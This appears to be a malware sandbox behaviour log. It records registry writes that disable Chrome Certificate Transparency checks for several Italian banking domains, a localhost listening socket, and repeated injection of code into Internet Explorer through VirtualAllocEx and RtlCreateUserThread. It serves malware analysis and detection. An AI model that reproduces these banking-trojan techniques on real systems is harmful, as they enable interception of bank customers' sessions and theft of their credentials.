Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 158, data = youwebcard.bancopopolare.it, size = 27, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 159, data = bywebcard.bancopopolare.it, size = 26, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 160, data = www.bpmbanking.it, size = 17, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 161, data = bpmbanking.it, size = 13, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 162, data = telemacoweb.credem.it, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 163, data = webteso.ubibanca.it, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 164, data = areariservata.bancamarche.it, size = 28, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 165, data = compasspay.compass.it, size = 21, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls, value_name = 166, data = secure.bancaifis.it, size = 19, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\CertificateTransparencyEnforcementDisabledForUrls	1	Fn
For performance reasons, the remaining 577 entries are omitted. The remaining entries can be found in glog.xml.

Thread 0x7e4

Category	Operation	Information	Count	Logfile
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Bind	protocol = IPPROTO_TCP, local_address = 127.0.0.1, local_port = 27822	1	Fn
Socket	Listen	local_address = 127.0.0.1, local_port = 27822, queue_length = 2147483647	1	Fn
Socket	Accept	type = SOCK_STREAM	1	Fn

Thread 0xa3c

68556

Category	Operation	Information	Count	Logfile
Module	Load	module_name = psapi.dll, base_address = 0x759d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\psapi.dll, function = GetModuleFileNameExA, address_out = 0x759d15bc	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Module	Get Handle	module_name = c:\windows\system32\ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = NtQueryInformationProcess, address_out = 0x77376048	1	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
System	Sleep	duration = 2000 milliseconds (2.000 seconds)	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsWow64Process, address_out = 0x76b54785	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x76b4c1b6	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Memory	Allocate	process_name = c:\program files\internet explorer\iexplore.exe, address = 27262976, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 79424	1	Fn
Memory	Write	process_name = c:\program files\internet explorer\iexplore.exe, address = 0x1a00000, size = 79360	1	Fn Data
Memory	Write	process_name = c:\program files\internet explorer\iexplore.exe, address = 0x1a13600, size = 32	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = RtlCreateUserThread, address_out = 0x77339250	1	Fn
Thread	Create	process_name = c:\program files\internet explorer\iexplore.exe, proc_address = 0x1a13600, proc_parameter = 0	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:19 (UTC)	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
System	Sleep	duration = 2000 milliseconds (2.000 seconds)	1	Fn
System	Get Info	type = Hardware Information	2	Fn
Memory	Allocate	process_name = c:\program files\internet explorer\iexplore.exe, address = 27852800, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 79424	1	Fn
Memory	Write	process_name = c:\program files\internet explorer\iexplore.exe, address = 0x1a90000, size = 79360	1	Fn Data
Memory	Write	process_name = c:\program files\internet explorer\iexplore.exe, address = 0x1aa3600, size = 32	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = RtlCreateUserThread, address_out = 0x77339250	1	Fn
Thread	Create	process_name = c:\program files\internet explorer\iexplore.exe, proc_address = 0x1aa3600, proc_parameter = 0	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:21 (UTC)	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
